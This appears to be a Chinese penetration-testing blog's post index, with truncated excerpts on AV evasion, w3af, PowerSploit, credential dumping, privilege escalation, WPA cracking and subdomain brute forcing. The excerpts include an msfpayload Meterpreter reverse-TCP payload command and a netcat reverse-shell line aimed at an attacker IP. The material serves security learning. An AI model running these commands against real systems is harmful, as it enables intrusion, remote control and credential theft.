- 博客(16)
- 收藏
- 关注
RSS订阅原创 使用Metasm来绕过杀毒软件
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary2.拷贝metasm.rb文件和metasm文件夹到rub...
2014-09-30 20:59:40
475
原创 [持续更新]工具集
[Javascript Deobfuscation Tools Redux] [url]http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/[/url][14 Best Open Source Web Application Vulnerability Scanners][url]http://...
2014-09-29 21:51:09
103
原创 [译]5步分析pdf文件
原文:http://countuponsecurity.com/2014/09/22/malicious-documents-pdf-analysis-in-5-steps/大多数企业网络边界都被保护。然而恶意pdf文件或MS office 软件可以成功通过防火墙,IPS,Anti-spam,杀毒软件以及其它保护措施。当到达受害邮箱后,通过使用社会工程技巧诱惑用户点击/打开文档。例如,如果用户...
2014-09-29 21:45:14
179
原创 [转]sqli雅虎
原文地址:http://www.sec-down.com/wordpress/?p=494Today I will blog about a SQL Injection vulnerability that were escalated to Remote Code Execution, Escalated to Root Privilege on one of Yahoo servers....
2014-09-29 20:36:59
86
原创 [译]w3af指南(四)
原文:[url]http://resources.infosecinstitute.com/w3af-tutorial-4/[/url]之前的文件我们学习了w3af中的插件以及他们的应用场合。本文,我们将学习一些w3af中附带的其他工具,他们可以帮助我们发送Manual Requests,进行Fuzzing,加密/解密请求和应答,使用代理截获/修改请求/应答,以及允许我们进行不同的HTTP请求...
2014-09-25 22:55:29
299
原创 [译]PowerSploit
原文:https://www.pentestgeek.com/2013/09/18/invoke-shellcode/渗透测试人员有很多方法可以获得GUI访问目标机器,例如猜测RDP, ESX 或vnc口令。然而绕开AV获得Meterpreter的最简单方法是使用PowerSploit([url]https://github.com/mattifestation/PowerSploit[/ur...
2014-09-25 21:13:07
167
原创 [译]psexec_command
原文:https://www.pentestgeek.com/2013/01/10/psexec_command-not-your-daddys-psexec/由于禁止了Volume Shadow copy服务以及远程桌面服务,但是由于拥有管理员权限,所以使用Metasploit中的psexec_command模块psexec_command 模块类似sysinternals psexec...
2014-09-25 00:37:09
177
原创 [译]获取Windows口令
原文地址:https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/参考资料:http://bernardodamele.blogspot.com.au/[b]一)从Windows主机上获取口令:[/b][color=blue][b]1)注册表[/b][/color]获得一份SYST...
2014-09-24 23:49:38
1249
原创 [译]w3af指南(三)
原文地址:http://resources.infosecinstitute.com/w3af-tutorial-3/本文将继续介绍前文剩下的插件。本文继续使用前文使用的Web Security Dojo虚拟机,下载地址:[url]http://sourceforge.net/projects/websecuritydojo/files/[/url][b]1)Brute force...
2014-09-24 00:52:31
349
原创 [译]w3af指南(二)
原文链接:[url]http://resources.infosecinstitute.com/w3af-tutorial-2/[/url]本文我们将继续学习如何使用w3af的discovery和audit插件来进行web漏洞扫描和相应的漏洞利用。同时我们将学习各种w3af使用的技术来发现这些漏洞。本文我们使用gui版本。[b]Web Security Dojo[/b]进行测试...
2014-09-23 17:22:36
284
原创 [译]w3af指南(一)
原文出自:http://resources.infosecinstitute.com/w3af-tutorial/w3af (Web Application audit and attack framework)是一个web安全审计框架。本文将学习w3af的大部分特性以及如何使用它进行web渗透测试。[b][color=red][注]原文写于2012年。最新的w3af是1.6.0....
2014-09-23 12:57:01
584
原创 [转]owasp使用w3af自动化审计
href:https://www.owasp.org/index.php/Automated_Audit_using_W3AF[code="html"]# -----------------------------------------------------------------------------------------------------------# ...
2014-09-22 22:03:31
360
原创 快速暴力破解域名
参考http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/方法一[color=red]cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.microsoft.com +answer[/color]man xar...
2014-09-18 21:00:29
805
原创 [译]windows提权基本法则
原文地址:http://fuzzysecurity.com/tutorials/16.html注意我将会使用各种版本的Windows来强调命令行可能存在的差异。记住不同的OS/SP差异可能导致命令格式不存在或者产生轻微不同的输出。我尝试把本文组织成各个版本的Windows通用的提权方法。(一)信息收集1)获取操作系统版本[color=red]C:\Windows\syste...
2014-09-18 00:07:15
528
原创 【转】Aircrack-ng Suite Cheatsheet
ref:https://evilzone.org/security-tools/aircrack-ng-suite-cheatsheet/Setting TX POWERiw reg set BOiwconfig wlan1 txpower 25Cracking WPAairmon-ng start wlan0airodump-ng -c (channel) –bs...
2014-09-03 22:24:59
168
原创 netcat反弹shell
注意:如果想要在小于1024的端口做监听,那么需要root权限一)通用场合1. 自己机器:nc —nvlp 4432. 目标机:nc attacker'sIP 443 —e /bin/bash-n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来)二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_...
2014-09-01 22:40:08
745
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人